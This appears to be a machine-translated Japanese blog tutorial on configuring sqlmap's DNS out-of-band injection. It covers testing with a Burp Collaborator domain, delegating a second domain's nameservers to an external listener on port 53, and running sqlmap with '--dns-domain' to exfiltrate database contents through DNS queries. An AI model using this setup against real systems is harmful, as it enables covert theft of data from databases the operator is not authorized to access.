sqlmap _dns インジェクション構成方法とは何ですか?

インターネット上には、sqlmap の DNS インジェクションに関する記事が少なすぎます。--dns-domain パラメータについて簡単に紹介しているだけです。関連する実用的な記事は曖昧であるか、一度に言及されているため、混乱を招きます (主に料理、鍵はまだボスが持ってきていません）。そこでネット上の方法を参考に再度やってみました。

準備する必要があるものは、1 つの sqlmap、Windows ブラインド インジェクション、2 つのドメイン名、および外部ネットワーク サーバーです。

#ある時、何かをしていたときに、タイムブラインドインジェクションというものに出会い、それが Windows マシンだったので、DNS インジェクションの方法を思い出しました。

始める前に、sqlmap の --sql-shell コマンドを使用して、DNS インジェクション ペイロードをテストする予定です

まず、burpsuite のコラボレーター クライアントに移動し、burp によって配置されたドメイン名をコピーします。

sqlmap を使用して SQL ステートメントを実行します

Sqlmapまだ実行中です リクエストは burpsuite で受信されました。

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

352E362E3134 は、version() を実行した後に返される結果です。

デコードして mysql のバージョンを取得します。まあ、現時点ではDNSインジェクションに問題はありません。

2 つのドメイン名を設定する準備をします。インターネット上の一部の記事では 1 つで大丈夫と書かれていますが、いつも面倒に感じます。多くのドメイン ネーム サーバー プロバイダーは特定の高度な機能を提供していないため、2 つ用意する方が簡単です。

www.a.com

www.b.com

まず、ドメイン名 a-> a.com

を設定します。

* を追加するだけで汎分析を実行し、外部ネットワーク サーバーの IP を指定できます。

さあ、ドメイン名 b->b.com を設定しましょう。

これはさらに簡単です。ドメイン名の DNS を直接変更して、次のように入力するだけです。 ns1 .a.com ns2.a.com で十分です。他に何もする必要はなく、入力するだけです。

その後、ドメイン名が有効になるまで待ちます。外部ネットワーク サーバーにアクセスして、解析が成功したかどうかをテストします。

サーバーはポート 53

のリッスンを開始します。 #その後、ローカル コンピュータが hello.b.com に ping を実行し、それを外部サーバーに送信します。hello.b.com からのリクエストを受信することができました。ローカル コンピュータは、ホストが見つからないため、ホストを見つける必要がないことを示すプロンプトを表示します。解析を設定していないため、無視されます。すべての設定が完了したので、DNS インジェクションに sqlmap を使用できます。

パラメータ --dns-domain=b.com --hex を Sqlmap に追加すると、次のことが可能になります。

このステップで、sqlmap がスタックし、DNS サーバー インスタンスのセットアップを求めるプロンプトが表示されます。

Direct ctrl c

プロンプトが表示され、DNS チャネルを介してデータを取得するように求められます。成功です。

インジェクション速度はエラーレポートやユニオンと同じくらい速いため、遅い速度に耐える必要はもうありません。

以上がsqlmap _dns インジェクション構成方法とは何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。